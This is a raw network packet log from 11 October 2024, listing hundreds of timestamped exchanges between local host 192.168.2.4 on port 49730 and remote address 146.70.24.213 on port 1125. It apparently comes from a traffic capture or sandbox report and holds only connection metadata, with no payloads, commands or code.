Oct 11, 2024 16:53:48.240406036 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240410089 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240425110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240433931 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240438938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240463972 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240487099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240499973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240513086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240523100 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240526915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240549088 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240575075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240587950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240602016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240612030 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240617037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240628958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240638018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240643024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240655899 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240663052 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240689993 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240737915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240751028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240763903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240782022 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240783930 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240806103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240818977 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.241352081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241365910 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241379023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241389990 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.241393089 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241406918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241415024 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.241442919 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.241472006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241482973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241497040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241509914 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241517067 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.241523027 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241537094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241545916 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.241552114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241565943 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241573095 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.241584063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241600990 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.241780996 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241794109 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241806984 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241816044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.241820097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241832972 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241842031 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.241852045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241868973 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.241879940 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241894007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241914034 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.241926908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241940975 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241954088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241961956 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.241976023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241991043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.241997957 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.242003918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242024899 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242024899 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.242038965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242053032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242058992 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.242065907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242079020 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242083073 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.242093086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242106915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242114067 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.242145061 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.242166996 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242180109 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242193937 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242206097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242213011 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.242227077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242240906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242243052 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.242258072 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242269993 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242283106 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.242284060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242299080 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242305040 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.242311954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242326021 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242332935 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.242341042 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242355108 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242367029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242379904 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.242403984 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.242443085 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.329219103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329240084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329252005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329263926 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329274893 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329287052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329299927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329313040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329343081 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.329379082 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329390049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329401016 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.329401970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329415083 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329433918 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.329449892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.329468012 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329480886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329493046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329504967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329518080 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329524994 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.329529047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329543114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329549074 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.329566002 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.329632044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329643965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329668045 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.329674959 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329687119 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329698086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329709053 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.329710960 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329724073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329734087 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.329737902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329757929 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.329797029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329808950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329821110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.329838037 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.329857111 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.330104113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330154896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330172062 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330183983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330194950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330197096 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.330233097 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.330250978 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330262899 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330275059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330286026 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.330286026 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330301046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330307007 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.330338955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330339909 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.330353022 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330502033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330548048 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.330579996 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330593109 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330604076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330615997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330621004 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.330646992 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.330653906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330665112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330676079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330688000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330694914 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.330699921 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.330707073 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.330733061 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331063032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331074953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331087112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331096888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331108093 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331115961 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331120014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331130028 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331132889 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331162930 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331191063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331202984 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331213951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331226110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331227064 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331237078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331248999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331250906 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331260920 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331269026 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331294060 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331455946 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331469059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331482887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331495047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331509113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331520081 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331521034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331536055 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331548929 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331557989 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331602097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331614971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331629038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331651926 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331670046 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331737995 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331806898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331819057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331830978 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331841946 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331844091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331856012 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331871033 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331871986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331883907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331898928 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331918955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331919909 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.331929922 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331940889 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.331973076 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.332037926 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.332055092 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.332073927 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.332876921 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.332906961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.332917929 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.332952976 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.332977057 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.333324909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333399057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333451033 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.333451033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333486080 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333537102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333568096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333583117 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.333600044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333611965 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.333616972 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333631992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333646059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333659887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333668947 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.333677053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333690882 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333693027 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.333705902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333718061 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.333720922 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333736897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333746910 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.333751917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333766937 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333777905 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.333781958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333796024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333811045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333818913 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.333827019 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333843946 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333843946 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.333863020 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.333868980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.333911896 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420013905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420042038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420109987 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420124054 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420124054 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420147896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420161963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420162916 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420181990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420196056 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420212030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420224905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420238018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420239925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420257092 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420258045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420281887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420299053 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420305967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420320988 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420336008 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420351028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420365095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420375109 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420380116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420401096 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420420885 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420434952 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420480013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420495033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420507908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420519114 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420522928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420538902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420548916 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420553923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420567989 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420582056 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420583963 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420597076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420608044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420612097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420635939 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420830011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420842886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420855999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420881033 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420885086 CEST	1125	49730	146.70.24.213	192.168.2.4
